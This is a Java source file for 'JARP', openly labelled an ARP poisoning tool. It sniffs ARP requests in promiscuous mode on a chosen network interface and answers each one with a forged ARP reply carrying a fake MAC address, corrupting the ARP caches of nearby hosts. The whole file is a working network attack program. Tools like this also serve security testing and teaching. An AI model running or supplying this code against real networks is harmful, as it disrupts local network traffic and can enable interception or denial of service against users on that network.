package org.tw.SAPala.utils;
/**
 * This is a class that captures ARP Request Packets (promiscuous mode) and
 * generates ARP Reply Packets with fake MAC address. It performs ARP poison.
 * 
 * <p>
 * Copyright (c) 2007 N3trino 
 * This program is free software: you can
 * redistribute it and/or modify it under the terms of the GNU General Public
 * License as published by the Free Software Foundation, either version 3 of the
 * License, or (at your option) any later version. This program is distributed
 * in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
 * the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
 * See the GNU General Public License for more details. You should have received
 * a copy of the GNU General Public License along with this program. If not, see
 * <http://www.gnu.org/licenses/>.
 * 
 * @author N3trino
 * @version 0.4.5
 * @since 0.3 Implements the Runnable interface instead Thread to create
 *        threads.
 */
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import jpcap.JpcapCaptor;
import jpcap.JpcapSender;
import jpcap.NetworkInterface;
import jpcap.NetworkInterfaceAddress;
import jpcap.packet.ARPPacket;
import jpcap.packet.EthernetPacket;

public class JARP implements Runnable {
	/** This creates an object that captures all the packets from the NIC */
	static JpcapCaptor captor;

	/** This creates an object that sends the ARP poison packets */
	static JpcapSender sender;

	/** This is an object that reads the input of the user. */
	static BufferedReader in = new BufferedReader(new InputStreamReader(
			System.in));

	/** This array save the details of network cards. */
	static NetworkInterface[] devices;

	/** This object is an ARP Reply packet. */
	static ARPPacket p;

	/** Creates the arp object which is an ARP packet */
	ARPPacket arp;

	/** Creates the ether object which is an Ethernet packet */
	EthernetPacket ether;

	/** This is the input from the user */
	static String str;

	/** This is the number of the interface that will be used. */
	static int i = 0;

	/**
	 * This is the main class that opens the available NICs and retrieves their
	 * information Then requests from the user to select which interface to use.
	 */
	public static void main(String[] args) {
		System.out.println("ARP Poisoning Tool by N3trino. JARP v 0.4.5");
		// Runs the nic method.
		nic();
		// Opens the selected device
		try {
			captor = JpcapCaptor.openDevice(devices[i], 65535, true, 20);
		} catch (IOException e) {
			System.out.println(e.getMessage());
		}
		// Sets the filter of the captor
		try {
			captor.setFilter("arp", true);
		} catch (IOException e) {
			System.out.println(e.getMessage());
		}
		// Initiates the runnable interface
		Runnable runnable = new JARP();
		// Initiates the thread.
		Thread thread = new Thread(runnable);
		// Sets the name of the Thread
		thread.setName("JARP");
		// Sets the thread's priority
		thread.setPriority(8);
		// Runs the Thread
		thread.start();
	}

	/**
	 * This method finds the available network interface cards and asks the user
	 * to choose which one to use for sending the ARP packets.
	 * 
	 * @param str
	 *            , the input from the user.
	 * @return i, the number of the network card.
	 */
	public static int nic() {
		// Obtain the list of network interfaces
		devices = JpcapCaptor.getDeviceList();
		for (int i = 0; i < devices.length; i++) {
			System.out.println(i + ": " + devices[i].name + "("
					+ devices[i].datalink_description + ")");
			// Prints the IP address for each NIC
			for (NetworkInterfaceAddress a : devices[i].addresses) {
				System.out.println(" address:" + a.address);
			}
		}
		System.out.print("> Choose the NIC you want to use:");
		// Reads the user's input
		try {
			str = in.readLine();
		} catch (IOException e) {
			System.out.println(e.getMessage());
		}
		// Checks if the user input is null
		while (str.isEmpty()) {
			System.out.println("> Null input isnot valid!");
			System.out.println("> Choose the NIC you want to use:");
			try {
				str = in.readLine();
			} catch (IOException e) {
				System.err.println(e.getMessage());
			}
		}
		// Converts the string to integer
		i = Integer.parseInt(str);
		return i;
	}

	/**
	 * This is the method that creates a new thread within the program captures
	 * ARP REquest only packets and creates ARP Reply packets with fake details
	 * And send them through the selected NIC.
	 */
	public void run() {
		while (true) {
			// read a packet from the opened network device
			p = (ARPPacket) captor.getPacket();
			if (p != null && p.operation == 1) {
				System.out.println(p.toString());
				// Create an ARP reply with fake details
				byte[] mac_fake = new byte[] { (byte) 254, (byte) 253,
						(byte) 252, (byte) 249, (byte) 11, (byte) 44 };
				byte[] scrip = p.target_protoaddr;
				byte[] mac_destination = p.sender_hardaddr;
				byte[] destip = p.sender_protoaddr;
				// Creates the ARP reply packet
				arp = new ARPPacket();
				// Set the parameters of the ARP packet.
				arp.hardtype = ARPPacket.HARDTYPE_ETHER;
				arp.prototype = ARPPacket.PROTOTYPE_IP;
				arp.operation = ARPPacket.ARP_REPLY;
				arp.hlen = 6; // Hardware address length
				arp.plen = 4; // Protocol address length
				arp.sender_hardaddr = mac_fake;
				arp.sender_protoaddr = scrip;
				arp.target_hardaddr = mac_destination;
				arp.target_protoaddr = destip;
				// Create the Ethernet packet
				ether = new EthernetPacket();
				ether.frametype = EthernetPacket.ETHERTYPE_ARP;
				ether.src_mac = devices[i].mac_address;
				ether.dst_mac = mac_destination;
				arp.datalink = ether;
				// Takes the NIC details from the captor in order to send the
				// packet
				sender = captor.getJpcapSenderInstance();
				// Sends the ARP packet
				sender.sendPacket(arp);
			}
		}
	}
}